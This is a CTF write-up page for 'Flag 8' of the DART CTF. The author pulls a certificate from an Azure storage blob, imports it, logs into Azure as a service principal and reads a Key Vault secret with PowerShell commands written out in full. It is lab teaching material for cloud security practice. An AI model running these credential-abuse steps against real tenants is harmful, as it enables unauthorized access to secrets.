Kabinet's GitBook
  • 🚩Kabinet CTF's Writeups
  • Page
  • 2025
    • Thuderdome
      • Emerge through the breach
      • Pulled from the sky
      • An absent defense
      • A new wave (web of deceit)
      • Crossing the great divide
      • Joining forces as one
      • Infiltrate (open the gate)
      • Jaeger
      • Victory
  • 2024
    • GreyCTF 2024
      • Markdown Parser
      • Fearless Concurrency
      • GreyCTF Survey
      • Baby Web
      • Beautiful Styles
      • All About Timing
      • Poly Playground
    • TetCTF 2024
      • Hello from API GW
      • Microservices
  • 2023
    • BSidesSF Cloud Village CTF
      • Tony Tony Tony
      • Plain Sight
      • A Suit of Armor Around The World
      • Sharing is Caring + Sequel
      • Photo Drive
    • DART CTF
      • Flag 1
      • Flag 2
      • Flag 3
      • Flag 4
      • Flag 5
      • Flag 6
      • Flag 7
      • Flag 8
      • Flag 9
      • Flag 10
    • EKS Cluster Games
    • Big IAM Challenge
  • 2022
    • Stack The Flag
      • Secret of Meow Olympurr
  • Authored
    • Cyber League 2025 Major 1
      • Perfect Storage
      • catalog commits
      • pawtainer hub
    • Lag and Crash 2023
      • Managed Secrets
      • Pickle Rick
      • Cloudy with a chance of meatball
    • NYP InfoSec December CTF 2022
      • Super Secure Technology Infrastructure
      • Self Introduction
      • Aww Cuter Cat
      • Obligatory Calc
      • BreadSecurity
  • NYP InfoSec Introduction to Pentesting Workshop
Powered by GitBook
On this page

Was this helpful?

  1. 2023
  2. DART CTF

Flag 8

PreviousFlag 7NextFlag 9

Last updated 2 years ago

Was this helpful?

Continuing where I left off from Flag 7, I retrieved the LORRI-Cert.txt

Request

curl --location 'https://coresat.blob.core.windows.net/datahandling/LORRI-Cert.txt' \
--header 'Authorization: Bearer ${token}' \
--header 'x-ms-version: 2017-11-09'

Response

I saved the response to a file, and opening it using notepad shows a bunch of base64 encoded value. As the file name suggest that its some kind of certificate, more googling needs to be done.

ChatGPT also helped out by giving step by step instructions.

Import-Certificate -FilePath C:\Users\Edwin\Desktop\cert.pfx -CertStoreLocation Cert:\CurrentUser\My
Get-ChildItem -Path Cert:\CurrentUser\My
Connect-AzAccount -CertificateThumbprint "208AC4D5170A93061432E06C16F573E776E6180C" -SubscriptionId "7b9bd916-8bd2-4446-9678-8531ef663edb" -ApplicationId "6de8103e-049a-4f88-9abf-41099a79ca53" -TenantId "5f487283-b88e-4ade-8035-7bcaac4156b3"

Running the Get-AzResource shows that I have access to an Azure Key Vault.

Get-AzKeyVault
Get-AzKeyVaultSecret -VaultName cubesat

Get-AzKeyVaultSecret -VaultName cubesat -Name Flag8 -AsPlainText

Flag 8 : DART spacecraft has entered final descent.

The article from shows how I can authenticate with the cert.

The Application ID is retrieved from the current version of OSIRIS-REx.txt found in tsarray stroage account at .

Now, I can either manually enumerate the Azure Key Vault, or use Get-AzPasswords to list the key vault secrets.

Azure
Flag 2
MicroBurst
Sign in with Azure PowerShellMicrosoftLearn
Logo